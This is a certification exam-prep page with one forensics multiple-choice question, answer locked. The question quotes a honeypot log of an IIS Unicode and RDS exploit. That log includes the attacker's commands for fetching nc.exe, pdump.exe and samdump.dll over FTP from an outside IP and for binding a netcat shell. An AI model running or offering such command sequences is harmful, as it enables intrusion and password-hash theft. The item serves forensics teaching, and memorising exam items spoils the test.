EC-Council
312-49V9 · Question #325
312-49V9 Question #325: Real Exam Question with Answer & Explanation
Sign in or unlock 312-49V9 to reveal the answer and full explanation for question #325. The question stem and answer options stay visible for context.
Question
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?
Options
- AIt is a local exploit where the attacker logs in using username johna2k
- BThere are two attackers on the system ?johna2k and haxedj00
- CThe attack is a remote exploit and the hacker downloads three files
- DThe attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
Unlock 312-49V9 to see the answer
You've previewed enough free 312-49V9 questions. Unlock 312-49V9 for full answers, explanations, the timed quiz mode, progress tracking, and the master PDF. Question stem and options stay visible so you can still see what's on the exam.